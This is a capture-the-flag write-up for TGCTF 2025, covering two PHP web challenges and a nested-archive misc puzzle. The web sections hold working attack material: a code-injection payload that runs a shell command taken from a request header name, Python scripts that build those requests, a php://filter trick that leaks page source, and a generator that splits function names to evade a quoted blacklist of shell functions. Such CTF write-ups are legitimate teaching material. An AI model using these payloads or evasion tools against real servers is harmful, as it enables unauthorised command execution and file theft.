web

AAA偷渡阴平

?tgctf2025=system(key(getallheaders()));

key(getallheaders()) returns the name of the first request header (key() yields the array key, i.e. the header name, not its value), and system() then executes that name as a shell command, so the command is sent as the name of the very first header of the request. We first list the directories and find the flag at ../../.., then change the command to cat ../../../flag to get the flag.
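As an added illustration (my code, not part of the original writeup), the Python below models what PHP's getallheaders() and key() see for a raw request and builds the exploit request with the command as the name of the first header. The host target.example, the assumption that ?tgctf2025= is evaluated as PHP, and the sample request are constructed, not captured. It also assumes the SAPI hands headers to PHP in the order they were sent and passes a name containing spaces through; such a name is not a valid RFC 7230 token, so check that against the target with a harmless command first.

```python
import socket
from urllib.parse import quote

# Constructed raw request (not a real capture) showing the header layout
# that makes key(getallheaders()) return the command.
SAMPLE_REQUEST = (
    b"GET /?tgctf2025=system(key(getallheaders())); HTTP/1.1\r\n"
    b"cat ../../../flag: x\r\n"
    b"Host: target.example\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def getallheaders(raw: bytes) -> dict:
    """Model of PHP getallheaders(): ordered name -> value map of the request
    headers. Assumption: the SAPI preserves the order the headers were sent in."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        if not line:
            continue
        name, _colon, value = line.partition(b":")
        headers[name.strip().decode("latin-1")] = value.strip().decode("latin-1")
    return headers


def php_key(arr: dict):
    """PHP key() on a freshly built array: the KEY (header name) of the first
    element, not its value; None for an empty array."""
    return next(iter(arr), None)


def build_request(host: str, cmd: str, path: str = "/", param: str = "tgctf2025") -> bytes:
    """Raw HTTP/1.1 request with the command as the NAME of the first header.
    Host has to come after it, which is why a raw socket is used instead of an
    HTTP library that always emits Host first."""
    query = quote("system(key(getallheaders()));", safe="();")
    lines = [
        f"GET {path}?{param}={query} HTTP/1.1",
        f"{cmd}: x",  # key(getallheaders()) returns this name
        f"Host: {host}",
        "Connection: close",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def send_raw(host: str, port: int, request: bytes, timeout: float = 5.0) -> bytes:
    """Ship the raw request over a TCP socket and return the response bytes."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while chunk := sock.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    req = build_request("target.example", "cat ../../../flag")
    print("command selected by key():", php_key(getallheaders(req)))
    # Uncomment against a real target (hypothetical host above):
    # print(send_raw("target.example", 80, req).decode(errors="replace"))
```

Start with a command such as id or ls to confirm the header survives the server before trying the full path.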

火眼辩魑魅

First, visiting robots.txt reveals:

User-Agent: *
Disallow: tgupload.php
Disallow: tgshell.php
Disallow: tgxff.php
Disallow: tgser.php
Disallow: tgphp.php
Disallow: tginclude.php

Going through them one by one, tginclude.php turns out to accept the php://filter wrapper, so php://filter/convert.base64-encode/resource=<page> returns the base64-encoded source of any other page instead of executing it. Decoding tgshell.php shows that the input is checked with

if(!preg_match("/openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|scandir|assert|pcntl_exec|fwrite|curl|system|eval|assert|flag|passthru|exec|chroot|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore/i", $shell))

so the command only runs when none of those words appears (case-insensitively) anywhere in $shell.

The check is a plain substring match on the source text, so it can be bypassed by assembling the function name at run time with string concatenation, e.g.

('sy' . 'stem')('cat ../../../tgfffffllllaagggggg');

We first list directories to find that the flag sits three levels up, then cat it directly. Note that neither cat nor the file name tgfffffllllaagggggg contains a blocked word: the name never spells out flag as a contiguous substring, which the filter would catch.
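As an added example (my code, not the challenge's or the writeup's), the Python below ports the blacklist from tgshell.php so a payload can be checked offline before it is sent, generates a concatenated call that dodges the filter, and builds and decodes the php://filter read used against tginclude.php. The parameter name file for tginclude.php and the host target.example are assumptions; the page does not give them.

```python
import base64
import re
from urllib.parse import quote

# Blacklist copied from the tgshell.php source recovered through php://filter
# ('popepassthru' is spelled as found there); PCRE's /i becomes re.IGNORECASE.
BLACKLIST = re.compile(
    r"openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|scandir"
    r"|assert|pcntl_exec|fwrite|curl|system|eval|assert|flag|passthru|exec"
    r"|chroot|chgrp|chown|shell_exec|proc_open|proc_get_status|popen"
    r"|ini_alter|ini_restore",
    re.IGNORECASE,
)


def is_blocked(shell: str) -> bool:
    """True when tgshell.php's preg_match() would reject this input."""
    return BLACKLIST.search(shell) is not None


def concat_call(func: str, arg: str) -> str:
    """Rewrite func('arg') as ('fu' . 'nc')('arg'), picking a split point so no
    blocked word survives in either half. The check is a substring match on the
    source text; PHP only assembles the name at run time and then calls it."""
    for i in range(1, len(func)):
        candidate = f"('{func[:i]}' . '{func[i:]}')('{arg}');"
        if not is_blocked(candidate):
            return candidate
    raise ValueError(f"no split of {func!r} with argument {arg!r} evades the filter")


def filter_read_url(base: str, resource: str, param: str = "file") -> str:
    """URL that makes tginclude.php return a file base64-encoded instead of
    including it. Assumption: the include parameter is named 'file'."""
    wrapper = f"php://filter/convert.base64-encode/resource={resource}"
    return f"{base}?{param}={quote(wrapper, safe='/:=')}"


def decode_filter_output(body: str) -> str:
    """Recover the source text from the base64 blob the filter chain returns."""
    return base64.b64decode(body.strip()).decode("utf-8", errors="replace")


if __name__ == "__main__":
    # target.example is a hypothetical host
    print(filter_read_url("http://target.example/tginclude.php", "tgshell.php"))
    for cmd in ("ls ../../../", "cat ../../../tgfffffllllaagggggg", "cat ../../../flag"):
        try:
            print(concat_call("system", cmd))
        except ValueError as err:
            print("rejected:", err)
```

The last command in the demo is rejected because the argument itself contains flag; that is exactly why a path spelled without the blocked word is needed.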

This gives TGCTF{bd737064-fc78-5d40-df61-03e28c2a91e7}

misc

Unzipping the archive reveals many nested layers, so I simply asked Doubao to write code that opens the last layer:

import os


def read_deep_folder(folder_path, folder_name):
    """Descend through same-named nested folders and return the deepest one."""
    try:
        # Build the path of the same-named sub-folder one level down
        sub_folder_path = os.path.join(folder_path, folder_name)
        # If that path is a folder, recurse into it
        if os.path.isdir(sub_folder_path):
            return read_deep_folder(sub_folder_path, folder_name)
        # Otherwise this is the last layer: return the current path
        return folder_path
    except FileNotFoundError:
        print(f"Error: folder {folder_path} not found.")
    except Exception as e:
        print(f"Unexpected error: {e}")
    return None


def read_files_in_folder(folder_path):
    """Print the contents of every file below folder_path."""
    try:
        if os.path.exists(folder_path):
            for root, dirs, files in os.walk(folder_path):
                for file in files:
                    file_path = os.path.join(root, file)
                    try:
                        with open(file_path, 'r', encoding='utf-8') as f:
                            content = f.read()
                            print(f"Contents of file {file_path}:")
                            print(content)
                    except Exception as e:
                        print(f"Error reading file {file_path}: {e}")
        else:
            print(f"Folder {folder_path} does not exist.")
    except Exception as e:
        print(f"Unexpected error: {e}")


if __name__ == "__main__":
    # Replace with the starting folder path
    start_folder = "your_start_folder_path"
    # Replace with the name of the repeated same-named folder
    target_folder_name = "your_target_folder_name"
    result = read_deep_folder(start_folder, target_folder_name)
    if result:
        print(f"Path of the deepest folder: {result}")
        read_files_in_folder(result)

Opening the last layer reveals

flag{so_great!}